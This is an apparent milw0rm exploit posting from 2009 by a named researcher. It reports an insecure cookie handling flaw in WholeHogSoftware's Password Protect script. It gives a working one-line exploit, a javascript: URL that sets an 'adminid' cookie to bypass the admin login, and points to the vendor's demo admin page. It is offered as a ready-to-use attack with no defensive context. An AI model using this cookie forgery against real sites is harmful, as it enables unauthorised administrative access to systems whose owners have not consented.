17 lines
No EOL
634 B
Text
17 lines
No EOL
634 B
Text
###########################################################################
|
|
[+] WholeHogSoftware Password Protect Insecure Cookie Handling Vulnerability
|
|
[+] Script :Password Protect
|
|
[+] Site :http://wholehogsoftware.com
|
|
[+] Detay :http://www.wholehogsoftware.com/index.php/page/password_protect_enhanced
|
|
[+] Discovered By Mountassif Moad
|
|
|
|
[+] www.v4-team.com
|
|
|
|
[+] Greetz : All my Freind
|
|
###########################################################################
|
|
Exploit:
|
|
javascript:document.cookie = "adminid=8; path=/";
|
|
DeMo :
|
|
http://www.wholehogsoftware.com/demo/password_protect_enhanced/admin
|
|
|
|
# milw0rm.com [2009-02-03] |